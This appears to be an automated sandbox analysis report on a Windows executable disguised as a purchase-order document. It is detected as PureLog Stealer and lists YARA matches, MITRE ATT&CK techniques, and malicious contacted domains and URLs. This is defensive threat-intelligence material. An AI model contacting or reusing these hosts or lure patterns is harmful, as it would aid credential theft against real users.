Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27cb1fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27c71e4.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27e322c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27bfba8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27e322c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1394754443.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1394754443.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1402312929.00000000072E2000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1394754443.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Solicitud de pedido Documento No 168646080.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.3785670627.0000000004B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3785324441.0000000004AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1450157027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3781993487.0000000000B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1397158259.0000000004104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27cb1fc.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27c71e4.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27e322c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27bfba8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Solicitud de pedido Documento No 168646080.exe.27e322c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1394754443.0000000002763000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1394754443.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1402312929.00000000072E2000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1394754443.0000000002721000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	612 Process Injection	1 Rootkit	1 Credential API Hooking	121 Security Software Discovery	Remote Services	1 Credential API Hooking	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	41 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	612 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Solicitud de pedido Documento No 168646080.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
Solicitud de pedido Documento No 168646080.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://www.pollensense.com/	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.yobo-by.com/pz08/?cx=iU/VPDM1hXdODhSoU7U2JopiHjlxkOyRWPhUw/eyvzY6Otnmd1rCkE8jNVWF6hpsFcjAQEEsrA==&CR=_DHhAtX	0%	Avira URL Cloud	safe
http://www.nordens-media.com/pz08/?cx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVOb61eG0z72pbUCjvw==&CR=_DHhAtX	0%	Avira URL Cloud	safe
http://www.boostyourselftoday.comReferer:	0%	Avira URL Cloud	safe
http://www.yassa-hany.onlineReferer:	0%	Avira URL Cloud	safe
http://www.go-bloggers.comReferer:	0%	Avira URL Cloud	safe
http://www.aloyoga-uae.com/pz08/	100%	Avira URL Cloud	phishing
http://www.tobegoodlife.net	0%	Avira URL Cloud	safe
http://www.thewipglobal.com/pz08/www.boostyourselftoday.com	0%	Avira URL Cloud	safe
http://www.tobegoodlife.net/pz08/www.5819995.com	0%	Avira URL Cloud	safe
http://www.boostyourselftoday.com/pz08/	0%	Avira URL Cloud	safe
http://www.thewipglobal.com	0%	Avira URL Cloud	safe
www.rdlva.com/pz08/	0%	Avira URL Cloud	safe
http://www.sunriseclohting.storeReferer:	0%	Avira URL Cloud	safe
http://www.rdlva.comReferer:	0%	Avira URL Cloud	safe
http://www.rdlva.com/pz08/www.yassa-hany.online	0%	Avira URL Cloud	safe
http://www.5819995.com	0%	Avira URL Cloud	safe
http://www.thewipglobal.comReferer:	0%	Avira URL Cloud	safe
http://www.kxn.inkReferer:	0%	Avira URL Cloud	safe
http://www.thewipglobal.com/pz08/?cx=j7VZTyaPLotDIgtvuFm1Wc2ZOg86ksyi3hYWattYqpUq5IzwEATKEtPTRIq3N3amsDpuvgSkbA==&CR=_DHhAtX	0%	Avira URL Cloud	safe
http://www.sunriseclohting.store/pz08/www.plantasdasminas.com	0%	Avira URL Cloud	safe
http://www.kxn.ink/pz08/?cx=U4nNGnww1kjxOKScgSk+uScuMskua2ucq9ipsnk6Ch7erOE2tdRqmLDXrgubFDKibExXjkNZ4A==&CR=_DHhAtX	0%	Avira URL Cloud	safe
http://www.ytytyt016.xyz/pz08/www.aloyoga-uae.com	100%	Avira URL Cloud	phishing
http://www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX	0%	Avira URL Cloud	safe
http://www.phdop.xyz	0%	Avira URL Cloud	safe
http://www.5819995.com/pz08/www.tacoshack479.com	100%	Avira URL Cloud	malware
http://www.aloyoga-uae.comReferer:	0%	Avira URL Cloud	safe
http://www.tacoshack479.comReferer:	0%	Avira URL Cloud	safe
http://www.tobegoodlife.netReferer:	0%	Avira URL Cloud	safe
http://www.kxn.ink/pz08/	0%	Avira URL Cloud	safe
http://www.kxn.ink	0%	Avira URL Cloud	safe
http://www.plantasdasminas.comReferer:	0%	Avira URL Cloud	safe
http://www.tacoshack479.com/pz08/	100%	Avira URL Cloud	malware
http://www.go-bloggers.com/pz08/	0%	Avira URL Cloud	safe
http://www.yassa-hany.online	0%	Avira URL Cloud	safe
http://www.boostyourselftoday.com/pz08/www.yobo-by.com	0%	Avira URL Cloud	safe
http://www.boostyourselftoday.com/pz08/?cx=0FaXmte0/P3knfwA0sMIwS1mD7E8vQQWGPcDD9zpFFyhOAUFaj5MXy9fjN6AdDBGShPY7E+43Q==&CR=_DHhAtX	0%	Avira URL Cloud	safe
http://www.yobo-by.com/pz08/www.phdop.xyz	0%	Avira URL Cloud	safe
http://www.kxn.ink/pz08/www.nordens-media.com	0%	Avira URL Cloud	safe
http://www.rdlva.com	0%	Avira URL Cloud	safe
http://www.ytytyt016.xyz	100%	Avira URL Cloud	phishing
http://www.5819995.comReferer:	0%	Avira URL Cloud	safe
http://ww25.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpB	0%	Avira URL Cloud	safe
http://www.sunriseclohting.store/pz08/	0%	Avira URL Cloud	safe
http://www.plantasdasminas.com/pz08/	0%	Avira URL Cloud	safe
http://www.tacoshack479.com/pz08/www.sunriseclohting.store	100%	Avira URL Cloud	malware
http://www.ytytyt016.xyz/pz08/?cx=jtuLWRsQ7h/kdQWA3jOYD6sQTdy8Hpo6TuBbTJkxtbgc8qtuAyjytUGgDBD8ARNIyniRVdyhSg==&CR=_DHhAtX	100%	Avira URL Cloud	phishing
http://www.nordens-media.com/pz08/www.thewipglobal.com	0%	Avira URL Cloud	safe
http://www.tobegoodlife.net/pz08/	0%	Avira URL Cloud	safe
http://www.ytytyt016.xyz/pz08/	100%	Avira URL Cloud	phishing
http://www.yobo-by.com	0%	Avira URL Cloud	safe
http://www.boostyourselftoday.com	0%	Avira URL Cloud	safe
http://www.go-bloggers.com/pz08/www.tobegoodlife.net	0%	Avira URL Cloud	safe
http://www.yobo-by.comReferer:	0%	Avira URL Cloud	safe
http://www.sunriseclohting.store	0%	Avira URL Cloud	safe
http://www.phdop.xyz/pz08/www.rdlva.com	100%	Avira URL Cloud	phishing
http://www.tacoshack479.com	100%	Avira URL Cloud	malware
http://www.5819995.com/pz08/	100%	Avira URL Cloud	malware
http://www.nordens-media.comReferer:	0%	Avira URL Cloud	safe
http://www.nordens-media.com/pz08/	0%	Avira URL Cloud	safe
http://www.phdop.xyzReferer:	0%	Avira URL Cloud	safe
http://www.aloyoga-uae.com/pz08/www.kxn.ink	100%	Avira URL Cloud	phishing
http://www.thewipglobal.com/pz08/	0%	Avira URL Cloud	safe
http://www.nordens-media.com	0%	Avira URL Cloud	safe
http://www.plantasdasminas.com	0%	Avira URL Cloud	safe
http://www.go-bloggers.com	0%	Avira URL Cloud	safe
http://www.phdop.xyz/pz08/	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
boostyourselftoday.com	172.104.233.69	true	true	unknown
rdlva.com	3.33.130.190	true	true	unknown
nordens-media.com	15.197.142.173	true	true	unknown
www.aloyoga-uae.com	3.96.23.237	true	true	unknown
51yt-nlb-8ea864e2717dc817.elb.ap-east-1.amazonaws.com	18.167.179.176	true	false	high
www.thewipglobal.com	15.197.130.221	true	true	unknown
www.yassa-hany.online	103.224.212.213	true	true	unknown
giikin-shangcheng-jingling-3-2041841048.ap-southeast-1.elb.amazonaws.com	13.228.106.35	true	false	high
www.kxn.ink	104.21.12.188	true	true	unknown
www.boostyourselftoday.com	unknown	unknown	true	unknown
www.rdlva.com	unknown	unknown	true	unknown
www.nordens-media.com	unknown	unknown	true	unknown
www.ytytyt016.xyz	unknown	unknown	true	unknown
www.yobo-by.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.nordens-media.com/pz08/?cx=32Qm6Ke2HKMNxWuGOo4gUstP0NhHa1GW0Wc3g6Bmqj6dA0nbRKEtQTutVOb61eG0z72pbUCjvw==&CR=_DHhAtX	true	Avira URL Cloud: safe	unknown
http://www.yobo-by.com/pz08/?cx=iU/VPDM1hXdODhSoU7U2JopiHjlxkOyRWPhUw/eyvzY6Otnmd1rCkE8jNVWF6hpsFcjAQEEsrA==&CR=_DHhAtX	true	Avira URL Cloud: safe	unknown
www.rdlva.com/pz08/	true	Avira URL Cloud: safe	low
http://www.thewipglobal.com/pz08/?cx=j7VZTyaPLotDIgtvuFm1Wc2ZOg86ksyi3hYWattYqpUq5IzwEATKEtPTRIq3N3amsDpuvgSkbA==&CR=_DHhAtX	true	Avira URL Cloud: safe	unknown
http://www.kxn.ink/pz08/?cx=U4nNGnww1kjxOKScgSk+uScuMskua2ucq9ipsnk6Ch7erOE2tdRqmLDXrgubFDKibExXjkNZ4A==&CR=_DHhAtX	true	Avira URL Cloud: safe	unknown
http://www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX	true	Avira URL Cloud: safe	unknown
http://www.boostyourselftoday.com/pz08/?cx=0FaXmte0/P3knfwA0sMIwS1mD7E8vQQWGPcDD9zpFFyhOAUFaj5MXy9fjN6AdDBGShPY7E+43Q==&CR=_DHhAtX	true	Avira URL Cloud: safe	unknown
http://www.ytytyt016.xyz/pz08/?cx=jtuLWRsQ7h/kdQWA3jOYD6sQTdy8Hpo6TuBbTJkxtbgc8qtuAyjytUGgDBD8ARNIyniRVdyhSg==&CR=_DHhAtX	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.go-bloggers.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 00000007.00000002.3793412922.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.boostyourselftoday.com/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.boostyourselftoday.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tobegoodlife.net/pz08/www.5819995.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.aloyoga-uae.com/pz08/	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://excel.office.com	explorer.exe, 00000007.00000002.3805456572.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1408522157.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.thewipglobal.com/pz08/www.boostyourselftoday.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tobegoodlife.net	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yassa-hany.onlineReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thewipglobal.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rdlva.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sunriseclohting.storeReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	explorer.exe, 00000007.00000000.1400763219.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3793412922.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.rdlva.com/pz08/www.yassa-hany.online	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.5819995.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/	explorer.exe, 00000007.00000000.1404737205.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2272035015.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Solicitud de pedido Documento No 168646080.exe, 00000002.00000002.1394754443.00000000029DB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sunriseclohting.store/pz08/www.plantasdasminas.com	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thewipglobal.comReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000007.00000003.2271963651.0000000007320000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3794295750.0000000007319000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1400763219.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271937280.0000000007318000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2271828334.0000000007306000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.kxn.inkReferer:	explorer.exe, 00000007.00000003.2271606980.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075843895.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.3806898258.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2270957915.000000000C502000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
